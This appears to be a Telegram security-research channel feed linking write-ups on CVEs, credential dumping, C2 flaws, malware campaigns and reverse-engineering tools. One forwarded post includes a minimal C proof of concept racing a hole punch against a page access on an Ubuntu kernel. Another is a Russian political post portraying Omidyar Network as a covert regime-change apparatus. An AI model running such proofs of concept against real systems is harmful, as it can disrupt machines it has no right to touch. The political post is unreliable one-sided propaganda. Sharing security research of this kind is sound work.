Forwarded from ARVIN
Inside the Mind of a Ransomware Operator | Exclusive Interview
https://www.youtube.com/watch?v=LhLimreV-K0
https://www.youtube.com/watch?v=LhLimreV-K0
YouTube
Inside the Mind of a Ransomware Operator | Exclusive Interview
I sat down with an active ransomware operator for a conversation they didn't want me to have. No noscript, no filter.
⚠️ DISCLAIMER: This interview is for educational and research purposes only. The content discussed does not constitute endorsement of illegal…
⚠️ DISCLAIMER: This interview is for educational and research purposes only. The content discussed does not constitute endorsement of illegal…
❤5
K7 Antivirus: Named pipe abuse, registry manipulation and privilege escalation
https://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulation-and-privilege-escalation.html
#CVE-2024-36424
https://blog.quarkslab.com/k7-antivirus-named-pipe-abuse-registry-manipulation-and-privilege-escalation.html
#CVE-2024-36424
❤6🤔2
React2Shell (CVE-2025-55182) Exploitation: Real-World Incident Response to XMRig Cryptominer Attack
https://raminfp.info/blog/server-compromise-xmrig-cryptominer-incident/
https://raminfp.info/blog/server-compromise-xmrig-cryptominer-incident/
❤5
Sliver C2 Insecure Default Network Policy (#CVE-2025-27093)
https://hngnh.com/posts/Sliver-CVE-2025-27093/
https://hngnh.com/posts/Sliver-CVE-2025-27093/
❤3
REMOTE WINDOWS CREDENTIAL DUMP WITH SHADOW SNAPSHOTS: EXPLOITATION AND DETECTION
https://labs.itresit.es/2025/06/11/remote-windows-credential-dump-with-shadow-snapshots-exploitation-and-detection/
https://labs.itresit.es/2025/06/11/remote-windows-credential-dump-with-shadow-snapshots-exploitation-and-detection/
👍7
Windows Filtering Platform: Persistent state under the hood
https://blog.quarkslab.com/windows-filtering-platform-persistent-state-under-the-hood.html
https://blog.quarkslab.com/windows-filtering-platform-persistent-state-under-the-hood.html
❤3
Forwarded from CyberSecurityTechnologies
HarmonyOS_NEXT_Offensive_Testing.pdf
3.8 MB
#tools
#Mobile_Security
"Breaking The Harmony: Offensive Testing Of HarmonyOS NEXT Applications With Harm0nyz3r & DVHA", Black Hat Europe 2025.
]-> Harmony OS Next Analysis Tool
]-> Damn Vulnerable Harmony Application
// This talk presents the results of a security assessment of HarmonyOS NEXT and its application ecosystem, combining a custom-built testing framework (Harm0nyz3r) with a purposely vulnerable application (Damn Vulnerable HarmonyOS Application - DVHA). Live demonstrations will show how Harm0nyz3r maps an application's attack surface, crafts malicious payloads, and successfully exploits vulnerabilities in DVHA..
#Mobile_Security
"Breaking The Harmony: Offensive Testing Of HarmonyOS NEXT Applications With Harm0nyz3r & DVHA", Black Hat Europe 2025.
]-> Harmony OS Next Analysis Tool
]-> Damn Vulnerable Harmony Application
// This talk presents the results of a security assessment of HarmonyOS NEXT and its application ecosystem, combining a custom-built testing framework (Harm0nyz3r) with a purposely vulnerable application (Damn Vulnerable HarmonyOS Application - DVHA). Live demonstrations will show how Harm0nyz3r maps an application's attack surface, crafts malicious payloads, and successfully exploits vulnerabilities in DVHA..
❤5
Forwarded from Proxy Bar
Ubuntu 25.04 (ядро 6.14.11)
минимальный POC
What ?
минимальный POC
What ?
#define _GNU_SOURCE
#include <sys/mman.h>
#include <fcntl.h>
#include <stdio.h>
#include <linux/falloc.h>
#include <err.h>
#include <pthread.h>
#define SYSCHK(x) ({ \
typeof(x) __res = (x); \
if (__res == (typeof(x))-1) \
err(1, "SYSCHK(" #x ")"); \
__res; \
})
#define FALLOC_LEN 64 * 1024 * 1024 // Max on Ubuntu 25.04
pthread_barrier_t barrier;
int ffd;
char *fmap;
void hole_punch() {
SYSCHK(ffd = open("/dev/shm/", O_TMPFILE | O_RDWR, 0666));
SYSCHK(fallocate(ffd, 0, 0, FALLOC_LEN));
SYSCHK(fmap = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, ffd, 0));
pthread_barrier_wait(&barrier); // barrier 1
SYSCHK(fallocate(ffd, FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE, 0, FALLOC_LEN));
}
int main(void) {
pthread_barrier_init(&barrier, NULL, 2);
pthread_t hole_punch_thread;
SYSCHK(pthread_create(&hole_punch_thread, NULL, (void*)hole_punch, NULL));
struct timespec start, end;
pthread_barrier_wait(&barrier); // barrier 1
clock_gettime(CLOCK_MONOTONIC, &start);
volatile char dummy = *(char *)fmap; // Simulated kernel access during hole punch
clock_gettime(CLOCK_MONOTONIC, &end);
long long stall_ns = (end.tv_sec - start.tv_sec) * 1000000000LL + (end.tv_nsec - start.tv_nsec);
printf("Stall time: %lld ns\n", stall_ns);
}
🥰3
Forwarded from Сводки частной разведки
Omidyar Network.pdf
2.7 MB
Этот материал подготовлен выпускниками курса «Разведывательный анализ информации» Университета Прокси-разведки.
Omidyar Network представляет собой не традиционную благотворительную структуру, а сложный гибридный институт глобального влияния, совмещающий функции частного инвестиционного фонда, венчурного акселератора и оператора инструментов «мягкой силы» Соединённых Штатов Америки. Деятельность организации направлена на поддержание геополитических и идеологических интересов западной либеральной элиты.
Под видом поддержки «социального предпринимательства», «финансовой инклюзии» и «независимой журналистики» Omidyar Network участвует в гибридных режимных операциях, включая финансирование антиправительственных структур в ходе событий на Украине (2013–2014), а также поддержку дестабилизационных протестных движений в Нигерии, Филиппинах и других странах. Организация тесно взаимодействует с ключевыми внешнеполитическими структурами архитектуры США, в частности, с Агентством США по международному развитию (USAID) и Национальным фондом демократии (NED) , а также с крупнейшими филантропическими платформами, включая Фонд Сороса, Фонд Билла и Мелинды Гейтс, и другие, формируя коалиционную сеть, координирующую глобальную повестку в области «демократии», «цифровых прав» и «гражданского общества».
Особую обеспокоенность вызывает реализуемая фондом стратегия «цифровой трансформации», включающая такие инициативы, как MOSIP (модульная платформа цифровой идентификации), Better Than Cash Alliance и глобальную кампанию «50-in-5» по внедрению цифровой общественной инфраструктуры (DPI). Данные проекты создают основу для тотального контроля: через универсальную цифровую идентификацию, обязательный переход к безналичным расчётам, а также алгоритмические системы оценки поведения граждан.
Таким образом, Omidyar Network функционирует как один из наиболее влиятельных нетрадиционных инструментов внешнего воздействия, действующий в рамках формальной легальности, но по существу являющийся частно-государственным аппаратом системного вмешательства, маскирующим политическую инженерию под филантропию и технологический прогресс.
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2😁1
Forwarded from reconcore
Tor_Pentest_Report.pdf
1.2 MB
Tor Project Pentest - Code audit and network health report 2025.
#netsec #appsec #analytics #offensivesecurity @reconcore
This document outlines the results of a pentest and whitebox security review conducted against a number of Tor Project items. Test Targets: Network Metrics, Visualization Stack, Relay & Network Health Tools, Exit Relay Scanning, Bandwidth Measurement, Tor Core Code Changes
#netsec #appsec #analytics #offensivesecurity @reconcore
❤3
earlyremoval, in the Conservatory, with the Wrench: Exploring Ghidra’s decompiler internals to make automatic P-Code analysis noscripts
https://www.nccgroup.com/research-blog/earlyremoval-in-the-conservatory-with-the-wrench-exploring-ghidra-s-decompiler-internals-to-make-automatic-p-code-analysis-noscripts/
https://www.nccgroup.com/research-blog/earlyremoval-in-the-conservatory-with-the-wrench-exploring-ghidra-s-decompiler-internals-to-make-automatic-p-code-analysis-noscripts/
Ghidriff - Ghidra Binary Diffing Engine
https://i.blackhat.com/SecTor-2023/Presentations/Sector-23-McIntosh-GhidriffGhidraBinaryDiffingEngine-compressed.pdf
https://i.blackhat.com/SecTor-2023/Presentations/Sector-23-McIntosh-GhidriffGhidraBinaryDiffingEngine-compressed.pdf
Forwarded from H
Hi
This is Hosien , currently i'm investigating a malware campaign targeting Iranian spoken users , exploiting winrar (likely cve-2025-6218 or cve-2025-8088) . the code they used are advanced and i think we face APT or skillful cyber-criminals .
i'm asking you to share this message so we can find out how this Threat Actor spread it's malware above images show .rar file & opened decoy .doc file
This is Hosien , currently i'm investigating a malware campaign targeting Iranian spoken users , exploiting winrar (likely cve-2025-6218 or cve-2025-8088) . the code they used are advanced and i think we face APT or skillful cyber-criminals .
i'm asking you to share this message so we can find out how this Threat Actor spread it's malware above images show .rar file & opened decoy .doc file
🔥2
Source Byte
Hi This is Hosien , currently i'm investigating a malware campaign targeting Iranian spoken users , exploiting winrar (likely cve-2025-6218 or cve-2025-8088) . the code they used are advanced and i think we face APT or skillful cyber-criminals . i'm asking…
share here if you find something (any phishing emails , telegram post ....) :
https://news.1rj.ru/str/+SdT344H5Yec2YTRk
https://news.1rj.ru/str/+SdT344H5Yec2YTRk
2022 0-day In-the-Wild Exploitation…so far
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
https://projectzero.google/2022/06/2022-0-day-in-wild-exploitationso-far.html
As of June 15, 2022, there have been 18 0-days detected and disclosed as exploited in-the-wild in 2022. When we analyzed those 0-days, we found that at least nine of the 0-days are variants of previously patched vulnerabilities. At least half of the 0-days we’ve seen in the first six months of 2022 could have been prevented with more comprehensive patching and regression tests. On top of that, four of the 2022 0-days are variants of 2021 in-the-wild 0-days. Just 12 months from the original in-the-wild 0-day being patched, attackers came back with a variant of the original bug.
https://projectzero.google/2022/06/2022-0-day-in-wild-exploitationso-far.html
❤4
Playing with the Tigress software protection. Break some of its protections and solve their reverse engineering challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM.
https://tigress.cs.arizona.edu/challenges.html
https://tigress.cs.arizona.edu/challenges.html
❤3
Source Byte
Playing with the Tigress software protection. Break some of its protections and solve their reverse engineering challenges. Automatic deobfuscation using symbolic execution, taint analysis and LLVM. https://tigress.cs.arizona.edu/challenges.html
www.cs.cornell.edu
Flattening ASTs (and Other Compiler Data Structures)
This is an introduction to data structure flattening, a special case of arena allocation that is a good fit for programming language implementations. We build a simple interpreter twice, the normal way and the flat way, and show that some fairly mechanical…
❤4